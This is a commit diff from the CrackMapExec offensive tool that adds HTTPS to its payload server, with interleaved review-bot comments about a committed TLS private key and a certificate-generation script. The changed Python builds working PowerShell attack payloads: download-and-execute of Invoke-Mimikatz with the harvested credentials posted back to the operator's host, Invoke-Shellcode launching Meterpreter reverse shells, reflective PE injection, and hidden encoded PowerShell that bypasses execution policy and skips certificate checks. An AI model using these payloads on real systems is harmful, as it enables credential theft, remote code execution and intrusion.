Added HTTPS support as per #15

main
byt3bl33d3r 2015-10-16 15:25:35 -06:00
parent 8054b5e655
commit 7d2ba3c63a
4 changed files with 101 additions and 30 deletions

18
certs/crackmapexec.crt Normal file

@ -0,0 +1,18 @@
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----

27
certs/crackmapexec.key Normal file

@ -0,0 +1,27 @@
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
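Review bot: The private key `certs/crackmapexec.key` is committed to the repository, so every installation serves TLS with the same key and anyone with a copy of the repo can read it; a checked-in key has to be treated as public, which leaves the HTTPS listener with effectively no more authentication than plain HTTP. Keep only `certs/gen-self-signed-cert.sh` in the tree, add `certs/*.key` and the matching `certs/*.crt` to `.gitignore`, and generate the pair at install or first run. The server in the Python file opens `certs/crackmapexec.key` by a path relative to the working directory, so the generation step should write where that loader looks, or the loader should resolve the path against the script's own directory. The committed `certs/crackmapexec.crt` in the previous section has the same problem.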

3
certs/gen-self-signed-cert.sh Executable file

@ -0,0 +1,3 @@
#!/bin/bash
openssl genrsa -out crackmapexec.key 2048
openssl req -new -x509 -days 3650 -key crackmapexec.key -out crackmapexec.crt -subj "/"
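Review bot: The script writes `crackmapexec.key` and `crackmapexec.crt` into whatever directory it is run from, while the loader opens them under `certs/`, so running it from the repo root silently produces the files in the wrong place; it also carries on after a failed `genrsa`. Adding `set -euo pipefail` and `cd "$(dirname "$0")"` after the shebang makes it stop on the first error and always emit into `certs/`. `-subj "/"` yields a certificate with an empty subject and no SAN; a one-line comment such as `# Self-signed with an empty subject: clients cannot validate this certificate` would make that explicit for anyone regenerating it.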


@ -38,6 +38,7 @@ import csv
import re import re
import ntpath import ntpath
import socket import socket
import ssl
import hashlib import hashlib
import codecs import codecs
import BaseHTTPServer import BaseHTTPServer
@ -2686,22 +2687,9 @@ def enum_shares(smb):
return permissions return permissions
def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurlsa::logonpasswords exit'): def ps_command(command):
if args.ssl:
if katz_ip: command = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" + command
command = """
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-Mimikatz.ps1');
$creds = Invoke-Mimikatz -Command "{katz_command}";
$request = [System.Net.WebRequest]::Create('http://{addr}');
$request.Method = "POST";
$request.ContentType = "application/x-www-form-urlencoded";
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();
""".format(addr=katz_ip, katz_command=katz_command)
if args.force_ps32: if args.force_ps32:
command = 'IEX "$Env:windir\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}"'.format(b64encode(command.encode('UTF-16LE'))) command = 'IEX "$Env:windir\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}"'.format(b64encode(command.encode('UTF-16LE')))
@ -2712,12 +2700,37 @@ def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurl
return ps_command return ps_command
def gen_mimikatz_command(localip, katz_command='privilege::debug sekurlsa::logonpasswords exit'):
protocol = 'http'
if args.ssl:
protocol = 'https'
command = """
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Mimikatz.ps1');
$creds = Invoke-Mimikatz -Command "{katz_command}";
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}');
$request.Method = "POST";
$request.ContentType = "application/x-www-form-urlencoded";
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();
""".format(protocol=protocol, addr=localip, katz_command=katz_command)
return ps_command(command)
def inject_pscommand(localip): def inject_pscommand(localip):
protocol = 'http'
if args.ssl:
protocol = 'https'
if args.inject.startswith('met_'): if args.inject.startswith('met_'):
command = """ command = """
IEX (New-Object Net.WebClient).DownloadString('http://{}/Invoke-Shellcode.ps1'); IEX (New-Object Net.WebClient).DownloadString('{}://{}/Invoke-Shellcode.ps1');
Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(localip, Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(protocol,
localip,
args.inject[4:], args.inject[4:],
args.met_options[0], args.met_options[0],
args.met_options[1]) args.met_options[1])
@ -2728,10 +2741,12 @@ def inject_pscommand(localip):
elif args.inject == 'shellcode': elif args.inject == 'shellcode':
command = """ command = """
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-Shellcode.ps1'); IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Shellcode.ps1');
$WebClient = New-Object System.Net.WebClient; $WebClient = New-Object System.Net.WebClient;
[Byte[]]$bytes = $WebClient.DownloadData('http://{addr}/{shellcode}'); [Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}/{shellcode}');
Invoke-Shellcode -Force -Shellcode $bytes""".format(addr=localip, shellcode=args.path.split('/')[-1]) Invoke-Shellcode -Force -Shellcode $bytes""".format(protocol=protocol,
addr=localip,
shellcode=args.path.split('/')[-1])
if args.procid: if args.procid:
command += " -ProcessID {}".format(args.procid) command += " -ProcessID {}".format(args.procid)
@ -2740,8 +2755,10 @@ def inject_pscommand(localip):
elif args.inject == 'exe' or args.inject == 'dll': elif args.inject == 'exe' or args.inject == 'dll':
command = """ command = """
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-ReflectivePEInjection.ps1'); IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-ReflectivePEInjection.ps1');
Invoke-ReflectivePEInjection -PEUrl http://{addr}/{pefile}""".format(addr=localip, pefile=args.path.split('/')[-1]) Invoke-ReflectivePEInjection -PEUrl {protocol}://{addr}/{pefile}""".format(protocol=protocol,
addr=localip,
pefile=args.path.split('/')[-1])
if args.procid: if args.procid:
command += " -ProcID {}" command += " -ProcID {}"
@ -2924,14 +2941,14 @@ def connect(host):
if args.mimikatz: if args.mimikatz:
noOutput = True noOutput = True
args.command = ps_command(katz_ip=local_ip) args.command = gen_mimikatz_command(local_ip)
if args.mimi_cmd: if args.mimi_cmd:
noOutput = True noOutput = True
args.command = ps_command(katz_ip=local_ip, katz_command=args.mimi_cmd) args.command = gen_mimikatz_command(local_ip, args.mimi_cmd)
if args.pscommand: if args.pscommand:
args.command = ps_command(command=args.pscommand) args.command = ps_command(args.pscommand)
if args.inject: if args.inject:
noOutput = True noOutput = True
@ -3029,6 +3046,7 @@ if __name__ == '__main__':
parser.add_argument("-n", metavar='NAMESPACE', dest='namespace', default='//./root/cimv2', help='WMI Namespace (default //./root/cimv2)') parser.add_argument("-n", metavar='NAMESPACE', dest='namespace', default='//./root/cimv2', help='WMI Namespace (default //./root/cimv2)')
parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Specify a share (default: C$)") parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Specify a share (default: C$)")
parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)") parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
parser.add_argument("--https", dest='ssl', action='store_true', help='Serve everything over https instead of http')
parser.add_argument("-v", action='store_true', dest='verbose', help="Enable verbose output") parser.add_argument("-v", action='store_true', dest='verbose', help="Enable verbose output")
parser.add_argument("target", nargs=1, type=str, help="The target range, CIDR identifier or file containing targets") parser.add_argument("target", nargs=1, type=str, help="The target range, CIDR identifier or file containing targets")
@ -3153,18 +3171,23 @@ if __name__ == '__main__':
print_error('Unable to find combo file at specified path') print_error('Unable to find combo file at specified path')
sys.exit(1) sys.exit(1)
if args.mimikatz or args.mimi_cmd or args.inject or (args.ntds == 'ninja'): if args.mimikatz or args.mimi_cmd or args.inject or args.ntds == 'ninja':
print_status("Press CTRL-C at any time to exit") print_status("Press CTRL-C at any time to exit")
print_status('Note: This might take some time on large networks! Go grab a redbull!\n') print_status('Note: This might take some time on large networks! Go grab a redbull!\n')
server = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer) if args.ssl:
t = Thread(name='HTTPServer', target=server.serve_forever) httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), MimikatzServer)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile='certs/crackmapexec.crt', keyfile='certs/crackmapexec.key', server_side=True)
else:
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer)
t = Thread(name='HTTPServer', target=httpd.serve_forever)
t.setDaemon(True) t.setDaemon(True)
t.start() t.start()
concurrency(hosts) concurrency(hosts)
if args.mimikatz or args.inject or args.ntds == 'ninja': if args.mimikatz or args.mimi_cmd or args.inject or args.ntds == 'ninja':
try: try:
while True: while True:
sleep(1) sleep(1)